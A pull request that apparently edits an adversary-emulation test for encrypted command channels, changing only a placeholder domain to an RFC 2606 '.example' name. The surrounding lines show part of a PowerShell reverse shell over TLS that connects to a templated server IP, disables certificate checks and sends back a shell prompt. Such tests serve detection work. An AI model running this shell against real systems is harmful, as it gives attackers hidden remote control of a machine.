### PR TITLE
Update T1573.yaml - RFC 2606 compliant TLD.

### DIFF
--- a/atomics/T1573/T1573.yaml
+++ b/atomics/T1573/T1573.yaml
@@ -28,7 +28,7 @@ atomic_tests:
       $socket = New-Object Net.Sockets.TcpClient('#{server_ip}', '#{server_port}')
       $stream = $socket.GetStream()
       $sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
-      $sslStream.AuthenticateAsClient('fake.domain', $null, "Tls12", $false)
+      $sslStream.AuthenticateAsClient('fakedomain.example', $null, "Tls12", $false)
       $writer = new-object System.IO.StreamWriter($sslStream)
       $writer.Write('PS ' + (pwd).Path + '> ')
       $writer.flush()


### PR DESCRIPTION
**Details:**
Replacing `.domain` with `.example` in observation of RFC 2606, to avoid future potential complications if and when the `.domain` namespace becomes available like `.domains` is.

https://en.wikipedia.org/wiki/.example
https://en.wikipedia.org/wiki/List_of_Internet_top-level_domains#D

**Testing:**

**Associated Issues:**
N/A